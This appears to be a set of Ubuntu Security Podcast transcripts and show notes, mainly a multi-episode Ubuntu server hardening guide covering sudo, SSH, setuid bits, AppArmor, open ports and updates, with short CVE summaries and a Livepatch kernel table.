Time to dive into point number five. I was asked a question: is ‘ping’ still ‘setuid’ root? And the answer is actually “no”. Oh, well! Remember when we were talking about the dangers of ‘setuid’ binaries and I used ‘ping’ as an example to show the issues that might arise when you set that sneaky permission bit to 1? Well, it turns out that my example was a little bit outdated, since ‘setuid ping’ was already put on the WANTED list for “causing too many security issues” and was therefore demoted to non-‘setuid’ status. So, if you are using Ubuntu 20.04 LTS, for example, you can run an ’ls -la /usr/bin/ping’ and you will see permissions set to 755 instead of 4755. How is the privileged socket access performed in this case? Ah…well, that might be a discussion for a future podcast episode, especially since a little bird told me that the solution for that might have caused an even bigger issue than the ‘setuid’ bit when changes to remove it were initially being made. For now, I’ll just leave you to wonder a little bit more about this, and reinforce that, even if ‘ping’ is no longer ‘setuid’, the example stands to show the dangers of having this bit set, be it on ‘ping’, be it on any other executable in your system that might allow for malicious tampering. Consider the ‘ping’ example a template of what COULD happen should you decide to maybe set its ‘setuid’ bit. Don’t actually do that though, please.
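You can verify this yourself on a recent release; the mode bits are the whole point of the exercise (file sizes and dates will naturally differ per system):

```
$ ls -la /usr/bin/ping
-rwxr-xr-x 1 root root ... /usr/bin/ping    # 755: no 's' in the owner's execute slot
# a setuid ping would instead have shown:
# -rwsr-xr-x ... (4755)
```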
Point number six is as simple as: ’netstat’ has been replaced with ‘ss’. I mentioned using ’netstat’ to check open ports in your system because that is what I have been using since forever. Old habits die hard, I guess…and that, my friends, is definitely something I shouldn’t be saying here, because old habits will also compromise you, since it is always important to keep up-to-date with recent software if you plan on being secure. So yes, forgive me, for I have been a hypocrite. Information on ’netstat’ being deprecated is even in the ‘man’ page for netstat. Oof…it hurts to see my own mistakes. Read your manuals, people; they exist for a reason. But, you know what? You live and you learn. I know better now, and you do too. So let’s be better together, friends, and use ‘ss’ instead of the obsolete ’netstat’ to find ports in our system that are open for absolutely no reason! The good thing to come out of this mistake is that we get to once again remember the importance of updating and maintaining systems in order to actually keep them secure, and this also includes the system that is our own minds.
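The modern equivalent of the old ‘netstat’ invocation is mercifully short. A sketch:

```
sudo ss -tulpn    # TCP and UDP listening sockets, numeric ports, owning processes
# roughly replaces: sudo netstat -tulpn
```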
Ok, now that we have tackled the ahem minor errors I made in the last few episodes, and honorably mentioned applications I forgot about, let’s bring up a few other hardening suggestions made by the Ubuntu Security Team so that you can harden your system even more!
Let’s start with the Mozilla TLS configuration generator: this tool, which can be accessed at the “https://ssl-config.mozilla.org/” URL, can be used to generate configuration files for various server programs, Apache and Nginx included, and it considers three different security levels! Pretty nifty, and it gives you the opportunity to maybe learn more about application settings you might not have known all that much about in the first place, and how they can help you when you wish to do hardening for applications you use.
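To give a flavour of the output, here are a couple of representative Nginx directives of the kind such generators emit - an illustrative sketch only, not the tool’s verbatim output, so do generate a configuration for your exact server version:

```
# illustrative only - generate the real thing at https://ssl-config.mozilla.org/
ssl_protocols TLSv1.2 TLSv1.3;     # no SSLv3, TLS 1.0 or TLS 1.1
ssl_prefer_server_ciphers off;     # modern clients choose well on their own
ssl_session_timeout 1d;
```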
Let’s Encrypt is in this list as suggestion number two, and it is a tool that allows you to get certificates and renew them often enough that you can’t have expired certificates ruin your day. Let’s Encrypt is a CA, or, expanding on the acronym, a Certificate Authority, which is an entity you will need if you plan on using TLS to encrypt your web server’s communications, for example. You can use Let’s Encrypt to create your certificates and then configure the tool to automatically update these certificates whenever they are close to expiring. Phew! No need to worry about unintentionally sending unencrypted data over the wire because of a missed expired certificate! Give those attackers NO windows of opportunity!
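In practice the usual Let’s Encrypt client is certbot, which on Ubuntu is commonly installed as a snap. A minimal sketch for an Nginx host:

```
sudo snap install --classic certbot
sudo certbot --nginx            # obtain a certificate and wire it into the Nginx config
sudo certbot renew --dry-run    # confirm that automatic renewal will work
```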
AppArmor is installed in Ubuntu by default, and we already talked about it in the last episode, but I am here to ensure that you remember that it does exist, and, even better, you don’t even have to install it in your Ubuntu system to start using it. Take advantage of its existence and don’t forget to profile applications running in your system! Profile ’til you can’t no more and get that metaphorical armor polished and ready to take on everything and everyone, just because you can.
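A quick way to see what AppArmor is already doing for you:

```
sudo aa-status                     # loaded profiles, enforce vs complain mode
sudo apt install apparmor-utils    # aa-genprof, aa-enforce and friends for profiling
```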
And last but not least, I can’t NOT reinforce this, as I am in the security team and this is what we do for you: always install your updates. Always! It might seem annoying, it might take some of your time, it might even be a little bit angering…but isn’t making changes for the better what life is all about? Update and live to see your server survive another day! Update and sleep peacefully knowing that you are doing the best you can for that server you care about! Update and be ready! Some updates will require the restarting of services, so that those actually start using patched versions of recently changed libraries, and, when we are talking about the kernel, reboots might be necessary, so include restarting and rebooting in your update plans as well, or else the patching done by the security team won’t be effective in your system. If you are having trouble with this…shameless plug: consider using Ubuntu Livepatch in order to get those kernel security-critical updates installed into your system without having to reboot the machine! It’s free for personal use on up to three computers, and it is easy to set up through your Ubuntu system with your Ubuntu One account.
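The day-to-day commands, plus the reboot check, in one sketch - the Livepatch `<TOKEN>` placeholder comes from your Ubuntu One account:

```
sudo apt update && sudo apt upgrade         # install pending updates
cat /var/run/reboot-required 2>/dev/null    # file exists when a reboot is needed
sudo snap install canonical-livepatch
sudo canonical-livepatch enable <TOKEN>     # kernel patching without reboots
```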
And that is it! An extra episode to patch my previous mistakes, and to deliver to you updates on some previously incomplete information! An episode that mirrors the work done by the Ubuntu Team on its packages, and that hopefully brings you as many benefits as those patches do! Keep your patches up to date, keep your hardening up to date, keep your knowledge up to date, and I am sure you will be ready to face a lot more than you expect! Thank you all for listening to this extra episode of the Ubuntu hardening series on the Ubuntu Security Podcast. Feel free to share your thoughts on this subject and on this series in any of our social media channels! I hope to talk to you all once again in the future, but for now, I bid you farewell and until next time! Bye!
It’s PIE🥧 for everyone this week as Python finally becomes a position independent executable for Ubuntu 22.04, plus Camila brings you the third part in her Ubuntu server hardening guide and we cover security updates for FUSE, Bind, Apache, the Linux kernel and more.
105 unique CVEs addressed
- FUSE: `allow_other` mount option - this option specifies all users can access files from the FUSE fs, whereas normally FUSE enforces that only the user which mounted the filesystem has access
- Bind: connections could be left in `CLOSE_WAIT` status for an indefinite period after the connection was closed - DoS
- Apache: `mod_sed` -> crash, RCE
- Apache: `mod_lua` - crash -> DoS
- Apache: raising `LimitXMLRequestBody` to > 350MB (is 1MB by default) -> OOB write -> crash, RCE
- Linux kernel: cgroups `release_agent` not properly restricted -> privesc

KERNEL TYPE | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|
aws | 85.1 | 85.1 | 85.1 | — |
azure | 85.1 | — | 85.1 | — |
azure-4.15 | — | 85.1 | — | — |
gcp | 85.1 | — | — | — |
generic-4.15 | — | 85.1 | 85.1 | — |
generic-4.4 | — | — | 85.1 | 85.1 |
generic-5.4 | 85.2 | 85.2 | — | — |
gke | 85.1 | — | — | — |
gke-4.15 | — | 85.1 | — | — |
gke-5.4 | — | 85.1 | — | — |
gkeop | 85.1 | — | — | — |
gkeop-5.4 | — | 85.1 | — | — |
ibm | 85.1 | — | — | — |
ibm-5.4 | — | 85.1 | — | — |
lowlatency-4.15 | — | 85.1 | 85.1 | — |
lowlatency-4.4 | — | — | 85.1 | 85.1 |
lowlatency-5.4 | 85.2 | 85.2 | — | — |
oem | — | 85.1 | — | — |
Hello listener! Welcome back to our Ubuntu hardening podcast mini-series, where in three episodes, released across several weeks, we have been discussing how to build a network service in an Ubuntu operating system, but not just any Ubuntu operating system, and instead, a HARDENED one. Up until this point, we went from nothing to digital big bang, which was the equivalent of our system install; to years of chemical, geological, and climatic transformations, which were actually a few weeks maybe of setting up basic security measures after our initial install; to, at last, the point where we are ready to finally have our server be born, just as life was once born on our beautiful planet Earth. We reach the next stage in our evolution and prepare ourselves to now finally install our server. Don’t be a cheater though, and don’t skip any steps: if you haven’t listened to the other episodes, go do that before you move on here. Earth did not become what it is in a day, so…you can spare a few minutes to listen to the other episodes before continuing with this one. Other listeners might have waited a few weeks, and poor Earth waited billions of years! Lucky you that hardening your Ubuntu system is slightly easier than creating an entire planet, or even an entire universe, from scratch. Introductions made, let’s jump right in to finally getting our service and all related software up and running in our already hardened machine. And let’s harden it even more, shall we?
I will start this off by just saying: no installing of services that don’t use cryptography. HTTP? Gone! FTP? Next! Telnet? Please no. Don’t even joke about that. Just don’t, or I might actually just start crying unencrypted tears of anger. Encryption technology should be here to stay, and if you are sending sensitive data over the wire, give that data a reason to feel safe and protected during its digital travels. Add that S to the end of the network protocol names. Level up your HTTP and make it HTTPS. Configure your Apache or Nginx server to use TLS. Not SSL. SSL is deprecated. TLS version 1.2 or above. Another important thing to consider when installing the entire stack of applications, libraries and frameworks you might need to run your system: less is more. I actually saw this in a cooking show, and I agree with this statement. I know we sometimes might get amazed at the huge amount of possibilities we have whenever installing software. The human mind has created the most incredible utilities, and we have the power to simply install all of them with one simple command. But just because you have a wide variety of ingredients, it doesn’t mean you have to use them. Some people might like french fries with ice cream. That does not imply you need a french fry library to get your sundae application to be delicious. Sometimes a little chocolate sauce drizzle is all you need. Chef’s kiss! The point here is: install the minimum necessary to run your application. Don’t increase the attack surface. The more you have running in your system, the more possibilities of entry an attacker will have. Keep it short and sweet and avoid getting lost in a sea of files, users and processes when you don’t really know how they work or what they do. And while we are at it…if you do have the chance, try to install only one or two network services per system/device. Don’t have your server simultaneously be a web server, a mail server, a file server, a database server, and an ice cream server, because why not, right? Don’t, though. This limits the number of services that can be compromised if a compromise ends up happening. It limits the exposure for a single device. Plus, when installing the applications necessary to run these services, remember that a lot of applications like Apache, Nginx, MySQL, PHP…they all have security settings. They know they are the regular targets of attacks, so they provide the user with the tools to perform a secure install or set secure post-install configuration values. If it is provided to you, use it! Harden your application as well, after all, it is this application that will most likely be the point of entry into your system. So divide, secure and conquer!
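A quick audit of what is actually installed and running keeps that “less is more” promise honest. A sketch:

```
systemctl list-units --type=service --state=running    # what runs right now
apt list --installed 2>/dev/null | wc -l               # how many packages you carry
sudo apt autoremove                                    # drop dependencies nothing needs anymore
```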
We did it, friends. We have a device providing a service over the network. One would think that after 6 days of work creating a digital ecosystem we would be able to rest on the 7th day, as done by some mighty entities before us, however…people concerned with cyber security don’t sleep. Or stop. Ever! Cyber security is a continuous effort, so post application setup measures must be taken as well if you want your server to keep securely thriving. We have got to ensure the evolution of the species and keep our metaphorical Earth safe and in tiptop shape in order to guarantee the best chances of not only survival, but growth and prosperity. Who needs sleep when you can have the joy of knowing that you set up your device for execution success and longevity in the grueling environment that is the Internet! Let’s start then by disabling unnecessary open ports and stopping the execution of unwanted services. You set up your application using the minimum necessary, which is great. Sometimes, however, during install, or even during configuration, applications will open ports and set up services you might not need. Heck, we are talking about this in the post application install and setup phase of our process, however, this could also be done in the post installation of the operating system phase of the process. Checking out which ports are unnecessarily open, and closing these ports, will reduce the attack surface area of your system, as an attacker has fewer points of entry to choose from. A house with one door and one door only provides one single point of entry to an external entity. Of course this external entity could manufacture a new entry point using mechanical tools, but I then digress from the real intention of this analogy, so let’s stick to the basics of the idea here, shall we? An example of an unnecessary open port might be a database port. Sure, you have set up a host based firewall as we have already suggested, and no internet traffic which would have this service as a destination is allowed through, but still…layers!!! When we talk about security we talk about having layers upon layers that will protect you in case the previous one has somehow been cracked. So…trust your firewall without trusting it completely. If you don’t need the database port open to the entire Internet, only to localhost, then leave it open just for localhost. If you don’t want to do it for yourself, then do it for me? Please? It makes me a lot less nervous knowing that a multitude of unused open ports are being closed and removed from harm’s way. The Internet can be a brutal place, you know? Use a tool such as ’netstat’, check your open ports and disable Internet access for those that don’t need it through the related application’s configuration file or other available resources. It’ll be quicker than you think, and will provide you with long term peace of mind. Bonus points for the fact that you will know something weird might be happening when you see that some port that should not be accessible through cyberspace is being used to send some data to some shady IP address in a remote country. Syslog mail incoming!
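Taking the database example: with MySQL, the listening address is a single configuration line, so restricting it to localhost is cheap insurance. A sketch - the file path varies between MySQL/MariaDB versions:

```
# e.g. /etc/mysql/mysql.conf.d/mysqld.cnf
[mysqld]
bind-address = 127.0.0.1    # accept connections from this host only
```

Restart the service afterwards and confirm, with your port-listing tool of choice, that the port is now bound to 127.0.0.1 rather than 0.0.0.0.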
This same idea applies to unwanted services or unwanted daemons. Check out what is set to run automatically or in the background of your system, check your ‘cron’ files, and make sure that these background programs that might be a risk are not just there executing with the sole purpose of being exploited. Only the bare minimum necessary! Let’s not be digital gluttons here, after all, gluttony is one of the seven deadly sins. Deadly for your poor server which will have that background daemon cleaning files in a directory that did exist in the system, but doesn’t anymore, and is now completely useless. Yeah, that server gets exploited by an attacker that was able to leverage an unpatched zero-day in your Internet facing application. No, you might not have been able to defend yourself against the zero-day, but you definitely would’ve been able to avoid a more sophisticated attack against your device had you not let an unnecessary, vulnerability-prone daemon execute in your system just for the fun of it. The attacker gets in through an issue that is not your fault, but gets to stay and cause more problems because you were too software hungry to delete something that was no longer needed by the system. More software, more vulnerabilities. Another important thing to note here: this is a continuous effort, remember? Yes, we are talking about post application installation and setup security measures that can be applied to your system in order for it to be hardened, however, since the application environment will change together with the application, it is necessary to maintain the system and reanalyze all that has been set up in order to update the hardening if necessary. Your hardening needs to evolve together with your software and your application.
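Finding those background stragglers is mostly a matter of knowing where to look. A sketch - the disabled service name is purely hypothetical:

```
systemctl list-timers --all       # systemd timers
crontab -l                        # the current user's cron jobs
ls /etc/cron.d /etc/cron.daily    # system-wide cron entries
sudo systemctl disable --now stale-cleanup.service    # hypothetical example
```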
We haven’t yet talked about or dove deep into the elephant in the room subject that is system files. We surrounded the subject, got close to it here and there, but we still have not faced it head on, so let’s go for it now. Files contain the data which we analyze, which we process, which we use to perform our computing, since even execution of a program begins with the file containing the code that is to be executed. In Linux, and consequently in Ubuntu, everything is a file. This essentially means files will contain everything an attacker needs to compromise a system. They might want to just read a file and steal its data, they might want to edit a text configuration file and change the behavior of an application, or they might want to create a file from scratch which will be a program that, when run, will do malicious things in the system. The possibilities with files are endless, and that is why file permissions must be treated with the utmost care. We must protect the bricks that make up our operating system. You have your server running. You have everything you need on the system and you won’t be performing any further install or making any further changes critical to the service any time in the near future. So why not spend some time checking your application files and your system files to make sure they do not have any suspicious or possibly harmful permissions? What files in the system contain sensitive data that shouldn’t be accessed by every user? Which files can be read by all, but should have their editing permissions restricted only to the system administrator? Which executables are allowed to be executed by a specific group of users but not by any other user in the system due to dangerous commands being a part of the compiled code? This analysis must be made and sometimes default permissions must be questioned, since the idea is that you tailor your environment to your needs. Use ‘chmod’ and ‘chown’ to get your permissions right and protect your files.
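Two commands go a long way when hunting for questionable permissions - a sketch, with a hypothetical configuration file standing in for whatever you find:

```
sudo find / -xdev -type f -perm -0002      # world-writable files on the root filesystem
sudo chown root:root /etc/someapp.conf     # 'someapp.conf' is a hypothetical file
sudo chmod 640 /etc/someapp.conf           # owner rw, group r, others nothing
```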
An additional point of concern: ‘suid’ and ‘sgid’ binaries that might be available in the system. It is worth disabling this permission on files where it is unwanted, possibly because it can easily be exploited by an attacker for privilege escalation or even worse. For those unaware, a ‘setuid’ or ‘setgid’ binary will allow a user to execute that binary with privileges that are not necessarily the ones set for this user. The execution will happen with the privileges of the file owner or the file group instead. Think about the ‘ping’ program, for example. Our old friend, ‘ping’. ‘Ping’ is a ‘setuid’ binary owned by ‘root’. Whenever a user executes the ‘ping’ program, they run it with ‘root’ privileges, and this is generally necessary, since ‘ping’ requires the opening of a socket and this is not an operation that can be initiated by any random user in the system. However, since ‘ping’, IN THEORY, is pretty harmless, letting a user acquire the temporary privilege to open the socket and get ‘ping’ to run is a solution. Let’s consider, however, a situation where the ‘ping’ file’s permissions are changed to allow any user to edit it, so, writing to the file is available to everyone who wishes to do it. Makes me nervous just thinking about it…A user with little privilege in the system is then able to edit the file and change its contents to those of a program that runs ‘ping’, but at the end also opens a new shell. When this new ‘ping’ is executed with ‘root’ privileges, the new shell that is opened can be opened with ‘root’ privileges as well. See the problem here? Of course this is an example, and default permissions for the ‘ping’ executable do not allow any user to write to the file, the only user allowed to do that being ‘root’. The point here is to show the dangers of ‘setuid’ and ‘setgid’ binaries and encourage you to look at your system and disable these permission bits for files where they are not necessary. Maybe you don’t need your users to run ‘ping’ at all, so why not let just those with ‘sudo’ privileges involving network access be allowed to actually run it? Disable the ‘setuid’ bit and limit usage of ‘ping’ to those who really need it. The same goes for any other ‘setuid’ binary any fresh software install might have created. Or even files you have created and set permissions on yourself. ‘Setuid’ and ‘setgid’ binaries are very commonly leveraged by attackers to exploit a system, so having fewer of them is a good measure to apply in order to reduce your attack surface. Also…let’s continue doing continuous work here, and always check permissions and ‘suid’ or ‘sgid’ bits for new files that are welcomed into our system, or old ones that are updated.
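Enumerating these binaries, and stripping the bit where it isn’t wanted, looks roughly like this:

```
# list setuid and setgid files
sudo find / -xdev \( -perm -4000 -o -perm -2000 \) -type f
# remove the setuid bit from a binary that doesn't need it:
sudo chmod u-s /usr/bin/ping    # example only - decide per binary on YOUR system
```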
What’s next then? We seem to have covered all of our bases, securing every part of our system. Go us! However, some say that teamwork is the best kind of work, so let’s increase our hardening by going beyond our lonely manual configurations and implementations and use some security software to help us. You are not alone in the digital world. You are not the only one trying to make your device more secure and trying to protect it against Internet predators. A lot of people have developed a lot of software to help us strengthen our defenses and better manage security in our devices. So here are a few to consider: ‘fail2ban’, which is an intrusion detection and prevention system that will analyze your log files and block suspicious activity through your firewall should any be detected. Other open source software out there like Snort and Suricata can also be used to achieve similar things; also consider installing malware detecting software such as ClamAV or rootkit detecting software such as Rootkit Hunter; 2FA is highly recommended nowadays to anyone that wishes to use authentication in a secure manner, so why not implement it directly in your Ubuntu OS? Through Google’s PAM package, for example, it is possible to set 2FA for users logging into your machine, using ‘sudo’, doing everything in the system that requires a password! NO, don’t even think about considering the use of a less strong password because of this, but do see it as another layer added to the various others we have been building up here to keep your system secure; another authentication alternative is considering the usage of a centralized authentication system, where your users are not authenticated locally, but instead in a remote server dedicated to this type of service. Of course, do not forget that usually, a service providing device, such as your own server, will have local application-only users that do not need to be authenticated with this other centralized authentication unit in order to run their activities in the device, so do configure those properly. However, for users that are a part of your organization layout, it might be interesting to consider outsourcing your authentication needs to this extra server. Keep in mind, however, that this increases the attack surface for your infrastructure in general, since you add to it an entirely new service device, and apply it only if the pay-off is worth it to you and your entire structure; and last but not least, do consider using software that enforces Mandatory Access Control, such as SELinux, and of course, the one and only AppArmor.
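Getting these onto a system is a couple of package installs - a sketch; the PAM module still needs per-user enrolment and PAM configuration afterwards:

```
sudo apt install fail2ban                       # log-watching intrusion prevention
sudo apt install clamav rkhunter                # malware and rootkit scanners
sudo apt install libpam-google-authenticator    # TOTP 2FA module for PAM
google-authenticator                            # run as each user to enrol a token
```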
Mandatory Access Control, or MAC for short, is the counterpart to DAC, or Discretionary Access Control. In DAC, access control is performed in such a way that access to resources is allowed based on the identity of a user and on what the resource owners allow or not for that user on that resource. Here, all the OS can do is enforce permissions based on identity limits set by this resource owner. On the other hand, MAC is the type of access control where a policy administrator, which is usually the ‘root’ user, but can be another administrative user, is the one to establish access permissions to a resource, no matter the owner of that resource. The policy administrator is able to make such choices not only based on the resource but also based on the entity which will access it, this entity possibly being a user, or even a program, and resources being files, network devices and other programs. The operating system can then enforce access beyond what is set by the resource owner, considering more than just the identity of the entity that wishes to access the resource. In DAC, permissions for a specific resource can be easily changed by the user that owns it. The Linux file system permissions are an example of DAC. Changes to these permissions, as simple as they may be, can result in programs or users being able to interact with resources they normally shouldn’t, and the ever untrustworthy user is the only one standing in the way of that. On the other hand, in MAC, with permissions or sets of permissions being defined by a policy administrator only, a random user can no longer change the ones associated with a resource just because they own it. Well, they can, through DAC, but changing overall resource permissions will no longer be as easy as just running ‘chmod’. That is because, as an additional layer on top of the checks performed against the DAC set, MAC will give more granularity to the access control process, and, based on the rules set by the policy administrator, define in an owner independent manner what users or programs can access in the system, based on who they are and on what permissions they have assigned to them regarding each specific resource. And if some shady entity wants to maybe bypass that, they will have to go through the dead body of the kernel of the operating system, which is a much harder beast to face. Even though DAC might be a more flexible way to set resource permissions, MAC is usually considered the more secure alternative and it can even be used as a complementary measure on top of DAC to add more security to your system. You can do this, for example, by activating the AppArmor kernel security module in your Ubuntu OS, and it will allow you to restrict actions that running processes can take and resources they can access. AppArmor, therefore, will bind programs, and confine them, reducing the range of harmful operations a program might be able to execute in your system. Each program will have a profile associated with it, and these will contain access rules which, when broken, can have the related attempt simply reported, or instead blocked. An example would be disallowing access to a certain directory for the process that is your web server. The web server should only access web server related directories and files, and AppArmor can be set up to guarantee that.
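To make the web server example concrete, an AppArmor profile could contain rules along these lines - a hand-written fragment, not a complete profile (real profiles live under /etc/apparmor.d/ and are usually built with the aa-genprof tooling):

```
# fragment of a hypothetical profile for a web server binary
/var/www/** r,           # may read web content
/var/log/nginx/* w,      # may write its own logs
deny /home/** rwx,       # must never touch user home directories
```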
Joining DAC and MAC in your system will allow you to build up your security layers very efficiently, so do consider learning more about software that allows this to happen, as it will bring you closer to the hardened utopia we all look forward to achieving.
We did it. We created an inhabitable and secure ecosystem. Just like Earth after the many, many, MANY years that came after the big bang. Thankfully it didn’t take us that long, although it wasn’t a walk in the park getting all that hardening done. Our job, however, is never complete, as cyber security is a continuous effort. Have I already mentioned this? I can’t remember. Anyway, the idea is to keep hardening even after all is set and done to run your service. How can this be achieved?
Well, for starters, keep your Ubuntu system updated and install patched package versions when possible. Yes, sometimes updating breaks the system, but between spending time to maybe adjust to changes, and spending a lot of nights awake having to shoo away an attacker instead, which one would you rather do? Another thing that needs to be done, always, is maintenance of users, groups and files in the system. I already mentioned this, but I am bringing it up again because it is very important. Your server is now a living entity, working to provide data and utilities to users all across the Internet. Seasons will change, updates will happen, files will transform, users will come and go, but you will stay. You will stay and update user and file permissions according to what is applicable to your ever changing system at that point in time. Don’t assume that your initial configuration of users and files will apply forever. What is forever, though, is your effort to monitor and manage this system you have brought to life. Pretty words to live by, and what we should actually be doing with our planet, you know…taking care of it…but I once again digress. And just as a last tip…to end this suggestion list in a very random and abrupt manner: shred your files, don’t just remove them from the system. Deleting a file simply removes the reference to it in a filesystem, meaning someone can still dig it up from the disk should they be determined enough to do it. Get rid of sensitive data the correct way and overwrite on disk that which will no longer be used in your server.
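The coreutils tool for this is literally called shred. A sketch with a stand-in filename:

```
shred -u -n 3 secrets.txt    # overwrite 3 times, then remove the file
```

One caveat: on copy-on-write filesystems, journaled data and SSDs with wear levelling, in-place overwrites are not guaranteed to destroy every copy, so treat shred as one layer, not a guarantee.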
We finally reach the end, my friends, and the key takeaway here is: every system is unique, and every service will have its own infrastructure and needs. Do not apply all of the changes suggested here if they don’t bring any benefits to you. Mom used to tell you to eat your vegetables, but if you are allergic to one of them, I am sure she wouldn’t encourage you to do it, especially if you don’t like eating it! What I mean here is: all we have here are suggestions, some of which might be amazing and super useful to you, some of which won’t work for you at all. Know your system and you will definitely know what will work best for you. This might even be my actual last tip, if I haven’t made this clear enough with all I have said previously: know your IT infrastructure well, and you will better know how to manage it and how to defend it. Hardening might prevent a lot from happening, keeping you safe from various intended attacks, however, creativity has always driven the evolution of man, and creative hackers are plentiful out there, so your hardening might sometimes fail you. If you know your system well, though, you might just be the last layer of hardening the system needs to kick out that hacker that was able to worm their way into the network. Keep your planet orbiting around the sun, keep your ecosystem alive and well, and do it by knowing how it works and by taking care of it when what used to work might not anymore.
That is all for today’s listeners! I hope you enjoyed all of the hardening suggestions we had for you in this and in the two previous episodes, and I hope you get to use them in your own systems to make them more secure! As always, do feel free to share your thoughts in our social media channels, and for now, I bid you all farewell and until next time! Bye!
This week we bring you part 2 of Camila’s guide on Ubuntu server hardening, plus we cover vulnerabilities and updates in Expat, Firefox, OpenSSL, LibreOffice and more.
22 unique CVEs addressed
- libxml2: `xmlGetID()` returns a pointer to just-freed memory - so if the application has not done other memory modification etc then it is likely fine - although this is UB and other applications may not be so mundane, so still worth patching
- privilege restrictions could be bypassed (even with the `--no-privileged` option) by loading a crafted module that then calls `setuid()`
- a crafted `-F` argument could cause a possible crash / RCE

Hello listener! I have returned with the second part of our Ubuntu hardening podcast episode. You asked for it, and you’ve been waiting for more, and I am here to oblige. We were last seen concluding our Ubuntu install, bringing to fruition our digital big bang, which would then allow us to start setting up our galaxy, preparing our Earth-server environment to receive life in the form of code. Today, we dive into the hardening measures we can apply to our Ubuntu system right after a fresh install, but right before a server application setup. However, stop here and go listen to the last episode if you haven’t yet, or else you might be a little bit lost among the metaphorical stars. I’ll pause here so you can pause as well and go check that out. Back already? I will trust you, and believe that you now know how to harden your Ubuntu system during install, so let’s get moving and talk about what’s next!
Usually when you install an operating system you define the super user’s password during install…a ahem strong password. Right? Why am I talking about this in the post install section then? Because Ubuntu does not encourage usage of the ‘root’ user. If you remember correctly, or if you don’t, but you decide to do an install right now, you will remember/notice that during install you create a new user for the Ubuntu system that is not ‘root’. As previously defined, this user will have a strong password - RIGHT? - and by default, this user will also have full ‘sudo’ capabilities, and the idea is to use this user account instead of the root account to perform all necessary operations in the system. ‘Root’ will exist in the system but it has no password set, meaning that ‘root’ login is also disabled by default. This is actually a good thing, considering that you shouldn’t be using the ‘root’ user to perform basic activities in your system. ‘Root’ is just too powerful and your Ubuntu system knows that. That is why it creates a new user that has enough power in the system, but that can be controlled through the appropriate configuration of ‘sudo’. To run a privileged command through use of ‘sudo’, a user will need to enter their own password, so that is an extra layer of protection added to privileged commands in the system, as well as an extra layer of protection that prevents you from destroying everything after you decide to drink and type. Additionally, each ‘sudo’ call is recorded in a log file, which can be used for auditing and for threat analysis in your system through usage of other installed tools. ‘Sudo’, if configured correctly, will allow you to have more control over a user’s privileges in your system. By editing the /etc/sudoers file, you can define which groups in the system have which ‘sudo’ privileges, meaning, which users are allowed to run specific commands with the privileges of another user, which is usually ‘root’. As a result, you don’t have to worry about coming across a situation where someone logs in directly as ‘root’ and starts wreaking havoc in your system. You have created the appropriate users and groups, and have attributed the appropriate privileges to each when editing the ‘sudoers’ file. All users have strong passwords, and whenever they need to execute privileged commands, they have to enter this password, which makes it harder for an attacker that happens to get a shell to type away at their keyboard and, with no obstacles to hinder them, read the /etc/shadow file, for example. Granted, if attackers have a password for a user that has all ‘sudo’ privileges set, this is the equivalent of being ‘root’ on a system. But you’re better than that. You configured things in order to avoid all power being held by one single user, and ‘sudo’ allowed you to do that. ‘Root’ cannot be restricted in any way, while ‘sudo’ users can, and that is why using ‘sudo’, even if you can have pseudo-root users through it, is a better call. And yes, I know it’s not pronounced p-seudo…but if I pronounced it correctly, as simply pseudo-root users…it would have been kind of confusing. So sorry about the mispronunciation, but I had to get that silent P across. Maybe it’s intentional though, since a ‘sudo’ user is a pseudo-root user and a pseudo-root user or a pseudo-sudo user is the end goal for an attacker hacking into a system. Guess how many times it took me to record that?
Anyway, getting back on topic here…just remember to properly configure your ‘sudoers’ file. More than just defining what a user can and cannot run with ‘sudo’, you can also use ‘sudo’ itself to configure a secure path for users when they run commands through ‘sudo’. The ‘secure_path’ value can be set in the ‘sudo’ configuration file, and then, whenever a user runs a ‘sudo’ command, only values set in this parameter will be considered as being part of a user’s regular ‘PATH’ environment variable. In this way, you are able to delimit an even more specific working area for a user that is given ‘sudo’ privileges. Be careful though, and always edit the /etc/sudoers file with ‘visudo’, in order to avoid getting locked out from your own system due to syntax errors when editing this file. Do be bold, however, and go beyond the regular ‘sudo’ usage, where you create a new user that has all ‘sudo’ privileges, and instead correctly configure ‘sudo’ for your users, groups and system! It might seem like something simple, but it could make a huge difference in the long run.
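Pulling the last few paragraphs together, a couple of illustrative ‘sudoers’ lines - the group and command are hypothetical, and remember: only ever edit this file with ‘visudo’:

```
# edit with: sudo visudo
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# members of a (hypothetical) 'webadmins' group may only restart the web server
%webadmins ALL=(root) /usr/bin/systemctl restart nginx
```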
So, in our Ubuntu OS here, step number one post installation to keep our system safe is to create new users and assign them to appropriate groups, which will have super user privileges and permissions set according to the minimum necessary they need to run their tasks in the system. Remember: when it comes to security, if it’s not necessary, then don’t include it. Plus, as a final bonus to not having a root user configured, not having a root password makes brute forcing the root account impossible. Well, that’s enough of using the word ‘sudo’ for one podcast episode, am I right? Let’s jump into our next hardening measure and not use the word ‘sudo’ anymore. This was the last time! I promise. Sudo! Ok, ok, it’s out of my system now! Moving on!
So I hear you have your users properly set up in your system. You now want to login to this system through the network, using one of the good old remote shell programs. It is very likely this will be configured by you, so let’s talk about how we should set this up in a secure manner. For starters, let’s not ever, ever, EVER - pleaaaase…- use unencrypted remote shells such as the ones provided by applications/protocols such as Telnet. I mean…why? Just…why? Forget about Telnet, it has broken our hearts far too much for us to trust it any longer. We know better than to let data be sent through the network in clear text, right everyone? Ok, that being said, SSH is our best and likely most used candidate here. There is a package for it in the Ubuntu main component, meaning: it is receiving support from the Canonical team, including the security team, which will patch it whenever dangerous security vulnerabilities in the software show up. Bonus points! Just installing SSH and using it will not be enough if we are truly looking for a hardened system, so, after install, there are a few configurations we must make, through the SSH configuration file, to guarantee a more secure environment. Starting off with locking SSH access for the ‘root’ user. If you didn’t enable a ‘root’ user password in your system, then this is already applied by default in your Ubuntu OS, however, it is always nice to have a backup plan and be 200% sure that external users will not be able to remotely access your machine as the ‘root’ user. There could always be a blessed individual lurking around the corner waiting to set a ‘root’ password because “Sudo ‘wasn’t working’ when I needed it to, so I just enabled root”. Yeesh. In the SSH server configuration file there is a variable ‘PermitRootLogin’ which can be set to ’no’, and then you avoid the risk of having an attacker directly connect to your system through the Internet with the most powerful user there is. Brute force attacks targeting this user will also always fail, but you shouldn’t worry about that if you set strong passwords, right? We also want to configure our system to use SSH2 instead of SSH1, the protocol version considered best from a security point of view. The SSH configuration file can also be used to create lists of users with allowed access and users with denied access. It’s always easier to set up the allow list, because it’s easier to define what we want. Setting up a deny list by itself could be dangerous, as new possibilities of what is considered invalid may arise every second. 